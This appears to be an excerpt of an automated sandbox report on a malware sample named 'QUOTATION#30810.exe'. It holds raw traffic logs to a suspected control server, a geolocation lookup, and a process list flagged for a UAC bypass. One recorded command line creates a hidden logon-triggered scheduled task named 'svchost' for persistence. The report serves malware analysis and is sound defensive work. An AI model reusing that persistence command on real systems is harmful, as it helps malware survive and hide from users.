                                                                                                                                                                                    May 3, 2024 13:13:44.474237919 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474261045 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474296093 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474340916 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474368095 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474381924 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474423885 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474436998 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474447966 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474457026 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474474907 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474488020 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474529028 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474551916 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474551916 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474553108 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474567890 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474591970 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474597931 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474608898 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474617004 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474641085 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474658012 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474664927 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474699020 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474715948 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474729061 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474745989 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474782944 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474811077 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474829912 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474829912 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474901915 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474915028 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474960089 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.474963903 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474977016 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.474988937 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.475022078 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.475022078 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566448927 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566466093 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566478014 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566517115 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566574097 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566574097 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566585064 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566598892 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566617966 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566632032 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566662073 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566664934 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566692114 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566699982 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566706896 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566755056 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566756010 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566768885 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566804886 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566824913 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566868067 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566876888 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566893101 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566934109 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.566961050 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.566991091 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567028046 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567039967 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567053080 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567065954 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567070961 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567097902 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567122936 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567133904 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567133904 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567192078 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567204952 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567215919 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567260027 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567290068 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567305088 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567317009 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567332029 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567343950 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567348003 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567368984 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567408085 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567450047 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567466974 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567491055 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567497969 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567523003 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567536116 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567558050 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567565918 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567565918 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567572117 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567596912 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567621946 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567665100 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567668915 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567692995 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567732096 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567737103 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567745924 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567787886 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567809105 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567821980 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567835093 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567859888 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567868948 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567902088 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567909956 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567914009 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567926884 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.567958117 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.567970991 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568021059 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568027020 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568036079 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568061113 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568075895 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568139076 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568151951 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568183899 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568191051 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568238974 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568252087 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568259001 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568289042 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568306923 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568348885 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568362951 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568392038 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568417072 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568449974 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568471909 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568510056 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568525076 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568541050 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568552017 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568556070 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568583012 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568608046 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568620920 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568645000 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568676949 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568676949 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.568701029 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568772078 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568802118 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:44.568819046 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:44.696338892 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:45.344784021 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:13:45.513029099 CEST8049717178.237.33.50192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:45.513231993 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:13:49.265510082 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:13:49.438340902 CEST8049717178.237.33.50192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:49.438417912 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:13:49.556716919 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:49.706957102 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:50.438643932 CEST8049717178.237.33.50192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:50.439116955 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:13:53.940680027 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:54.037206888 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.037220955 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.037233114 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.037276030 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:13:54.134329081 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.134444952 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.145247936 CEST444549711172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:13:54.145309925 CEST497114445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:14:08.381800890 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:14:08.383910894 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:14:08.534854889 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:14:38.447671890 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:14:38.449346066 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:14:38.597378016 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:15:08.554042101 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:15:08.556905985 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:15:08.706794977 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:15:34.993132114 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:15:35.461528063 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:15:36.445913076 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:15:38.352174044 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:15:38.620752096 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:15:38.622376919 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:15:38.769025087 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:15:41.945914030 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:15:48.945930004 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:16:02.945899010 CEST4971780192.168.2.8178.237.33.50
                                                                                                                                                                                    May 3, 2024 13:16:08.720498085 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:16:08.722611904 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:16:08.863428116 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:16:39.548372984 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:16:39.633308887 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:16:39.718594074 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:16:39.863523960 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:17:09.595791101 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    May 3, 2024 13:17:09.640934944 CEST497084445192.168.2.8172.245.208.13
                                                                                                                                                                                    May 3, 2024 13:17:09.784871101 CEST444549708172.245.208.13192.168.2.8
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    May 3, 2024 13:13:45.043447018 CEST6080153192.168.2.81.1.1.1
                                                                                                                                                                                    May 3, 2024 13:13:45.133033991 CEST53608011.1.1.1192.168.2.8
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    May 3, 2024 13:13:45.043447018 CEST192.168.2.81.1.1.10xc93Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    May 3, 2024 13:13:45.133033991 CEST1.1.1.1192.168.2.80xc93No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                    • geoplugin.net
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.849717178.237.33.50804360C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    May 3, 2024 13:13:49.265510082 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    May 3, 2024 13:13:49.438340902 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                                                    date: Fri, 03 May 2024 11:13:49 GMT
                                                                                                                                                                                    server: Apache
                                                                                                                                                                                    content-length: 965
                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:13:13:21
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\Desktop\QUOTATION#30810.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION#30810.exe"
                                                                                                                                                                                    Imagebase:0x1fcf8300000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                    Start time:13:13:21
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                                                                                                                                    Imagebase:0x7ff726b60000
                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""
                                                                                                                                                                                    Imagebase:0x7ff726b60000
                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
